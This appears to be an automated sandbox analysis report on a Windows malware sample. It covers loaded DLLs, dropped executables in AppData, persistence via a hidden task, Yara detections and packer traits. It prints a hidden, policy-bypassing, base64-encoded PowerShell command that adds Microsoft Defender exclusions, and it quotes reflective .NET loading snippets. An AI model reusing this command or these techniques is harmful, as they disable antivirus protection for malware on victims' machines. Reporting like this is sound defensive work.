Source: C:\Users\user\AppData\Roaming\l6E.exe	Section loaded: edgegdi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: edgegdi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: webio.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wersvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: windowsperformancerecordercontrol.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: weretw.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: faultrep.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dbgcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: edgegdi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wlidsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: clipc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gamestreamingext.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msauserext.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: tbs.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptngc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: devobj.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptnet.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: elscore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: elstrans.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: PT54FFSL7ET46RASB.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: PT54FFSL7ET46RASB.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: PT54FFSL7ET46RASB.exe

Static file information: File size 1319800 > 1048576

Source: PT54FFSL7ET46RASB.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x13f000

Source: PT54FFSL7ET46RASB.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: PT54FFSL7ET46RASB.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: YZRVUYjilL.exe, 00000007.00000002.375928489806.000001F53EEB0000.00000004.00000800.00020000.00000000.sdmp, YZRVUYjilL.exe, 00000007.00000002.375928489806.000001F53ED84000.00000004.00000800.00020000.00000000.sdmp, YZRVUYjilL.exe, 00000007.00000002.375920946820.000001F52E994000.00000004.00000800.00020000.00000000.sdmp, YZRVUYjilL.exe, 00000007.00000002.375937209528.000001F5471D0000.00000004.08000000.00040000.00000000.sdmp, Current.exe, 0000000A.00000002.375954186503.0000021EAAC73000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: YZRVUYjilL.exe, 00000007.00000002.375928489806.000001F53EEB0000.00000004.00000800.00020000.00000000.sdmp, YZRVUYjilL.exe, 00000007.00000002.375928489806.000001F53ED84000.00000004.00000800.00020000.00000000.sdmp, YZRVUYjilL.exe, 00000007.00000002.375920946820.000001F52E994000.00000004.00000800.00020000.00000000.sdmp, YZRVUYjilL.exe, 00000007.00000002.375937209528.000001F5471D0000.00000004.08000000.00040000.00000000.sdmp, Current.exe, 0000000A.00000002.375954186503.0000021EAAC73000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: YZRVUYjilL.exe, 00000007.00000002.375928489806.000001F53ED0E000.00000004.00000800.00020000.00000000.sdmp, YZRVUYjilL.exe, 00000007.00000002.375928489806.000001F53ED36000.00000004.00000800.00020000.00000000.sdmp, YZRVUYjilL.exe, 00000007.00000002.375935522158.000001F547080000.00000004.08000000.00040000.00000000.sdmp, Current.exe, 00000012.00000002.376484616059.00000180E38A0000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: YZRVUYjilL.exe, 00000007.00000002.375928489806.000001F53ED0E000.00000004.00000800.00020000.00000000.sdmp, YZRVUYjilL.exe, 00000007.00000002.375928489806.000001F53ED36000.00000004.00000800.00020000.00000000.sdmp, YZRVUYjilL.exe, 00000007.00000002.375935522158.000001F547080000.00000004.08000000.00040000.00000000.sdmp, Current.exe, 00000012.00000002.376484616059.00000180E38A0000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 5.2.RegAsm.exe.436060.0.raw.unpack, ValClassDeSerializer.cs

.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

.NET source code contains potential unpacker

Source: 5.2.RegAsm.exe.436060.0.raw.unpack, WrapperVisitorProperty.cs

.Net Code: QueryField System.Reflection.Assembly.Load(byte[])

Suspicious powershell command line found

Source: unknown

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEQAeQBsAGEAbgBlAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABBAHIAZwB1AG0AZQBuAHQAQwBvAHUAbgB0AFwAQwB1AHIAcgBlAG4AdAAuAGUAeABlACwAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAEQAeQBsAGEAbgBlAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAEQAeQBsAGEAbgBlAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABBAHIAZwB1AG0AZQBuAHQAQwBvAHUAbgB0AFwAQwB1AHIAcgBlAG4AdAAuAGUAeABlAA==

Yara detected Costura Assembly Loader

Source: Yara match	File source: 10.2.Current.exe.21ebabb19e0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.Current.exe.180e387fc48.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.Current.exe.180f39819e0.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.YZRVUYjilL.exe.1f52cf50000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.Current.exe.180f3b35b38.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.Current.exe.180f3d65be0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Current.exe.21ebad65b38.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Current.exe.21ebaf95be0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.YZRVUYjilL.exe.1f53eab5b70.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.Current.exe.180f3b85b70.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Current.exe.21ebadb5b70.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Current.exe.21ebad65b38.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.YZRVUYjilL.exe.1f53e8b19e0.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.Current.exe.180f3b35b38.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.YZRVUYjilL.exe.1f53ea65b38.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.YZRVUYjilL.exe.1f53ea65b38.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.YZRVUYjilL.exe.1f53ec95be0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.Current.exe.180e387fc48.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000002.376484616059.00000180E3942000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.375954186503.0000021EAAA61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.375920601322.000001F52CF50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.376494366801.00000180F3D65000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.375975223417.0000021EBAF95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.376494366801.00000180F3B85000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.375928489806.000001F53EC95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.375975223417.0000021EBADB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.378376086685.00000245CC611000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.375975223417.0000021EBABB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.375928489806.000001F53EA65000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.376494366801.00000180F3981000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.375928489806.000001F53E761000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.376494366801.00000180F3B35000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.376484616059.00000180E3831000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.375975223417.0000021EBAD65000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.375920946820.000001F52E761000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: YZRVUYjilL.exe PID: 940, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Current.exe PID: 6912, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 8344, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Current.exe PID: 8884, type: MEMORYSTR

Source: glmIOFfdMi.exe.5.dr

Static PE information: 0x9944C62E [Mon Jun 26 19:40:30 2051 UTC]

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00428E7D push esi; ret	5_2_00428E86
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_004076E0 push ecx; ret	5_2_004076F3
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Code function: 6_2_057BCF82 push eax; iretd	6_2_057BCF89
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Code function: 6_2_057C79E8 pushfd ; iretd	6_2_057C7B1D
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Code function: 6_2_057E9F6C push ebx; iretd	6_2_057E9F92
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Code function: 6_2_057E9F8D push ebx; iretd	6_2_057E9F92
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Code function: 6_2_075352F9 pushad ; iretd	6_2_07535311
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Code function: 6_2_07540583 push 8BFFFFFEh; retf	6_2_07540604
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Code function: 6_2_07543EE0 push eax; retf	6_2_07543EE1
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Code function: 6_2_07580C05 push edi; retf	6_2_07580C06
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Code function: 6_2_0759323A pushad ; ret	6_2_0759323D
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Code function: 6_2_07599450 pushfd ; ret	6_2_07599451
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Code function: 7_2_00007FF93A8A7C6E pushad ; retf	7_2_00007FF93A8A7C9D
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Code function: 7_2_00007FF93A8A7C9E push eax; retf	7_2_00007FF93A8A7CAD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FF93A61D2A5 pushad ; iretd	8_2_00007FF93A61D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FF93A7300BD pushad ; iretd	8_2_00007FF93A7300C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FF93A7384DD push ebx; ret	8_2_00007FF93A73853A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FF93A73853D push ebx; ret	8_2_00007FF93A73853A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FF93A73866A push ebx; ret	8_2_00007FF93A7386BA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FF93A73860D push ebx; ret	8_2_00007FF93A73861A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FF93A735E57 push esp; retf	8_2_00007FF93A735E58
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FF93A800D70 push eax; retf	8_2_00007FF93A800D71
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Code function: 10_2_00007FF93A7377CA push esp; iretd	10_2_00007FF93A7377D1
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Code function: 10_2_00007FF93A73A0BD push ds; iretd	10_2_00007FF93A73A0C3
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Code function: 10_2_00007FF93A731843 push FFFFFFE8h; ret	10_2_00007FF93A731869
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Code function: 10_2_00007FF93A739121 push BEFFFFDEh; retf 0000h	10_2_00007FF93A739126
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Code function: 10_2_00007FF93A787801 pushad ; iretd	10_2_00007FF93A787839
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Code function: 10_2_00007FF93A7835B0 pushfd ; ret	10_2_00007FF93A783671
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Code function: 10_2_00007FF93A755A75 push eax; retf	10_2_00007FF93A755A0D
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Code function: 10_2_00007FF93A755A01 push eax; retf	10_2_00007FF93A755A0D
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Code function: 10_2_00007FF93A75EF78 push ebp; iretd	10_2_00007FF93A7642F8

Source: PT54FFSL7ET46RASB.exe	Static PE information: section name: .text entropy: 7.99955051552786
Source: glmIOFfdMi.exe.5.dr	Static PE information: section name: .text entropy: 7.870067595402444
Source: YZRVUYjilL.exe.5.dr	Static PE information: section name: .text entropy: 7.959305548795795

Persistence and Installation Behavior

Yara detected PersistenceViaHiddenTask

Source: Yara match	File source: 00000007.00000002.375920946820.000001F52E994000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.375941467848.000001F547619000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.375954186503.0000021EAADD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.375920946820.000001F52E93B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: YZRVUYjilL.exe PID: 940, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Current.exe PID: 6912, type: MEMORYSTR

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	File created: C:\Users\user\AppData\Roaming\l6E.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	File created: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Jump to dropped file

Boot Survival

Yara detected PersistenceViaHiddenTask

Source: Yara match	File source: 00000007.00000002.375920946820.000001F52E994000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.375941467848.000001F547619000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.375954186503.0000021EAADD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.375920946820.000001F52E93B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: YZRVUYjilL.exe PID: 940, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Current.exe PID: 6912, type: MEMORYSTR

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe

Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\92F976A0251E9247E50EC0FD39D377B7 93b21885452761d5418e7b08ca003661

Jump to behavior

Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
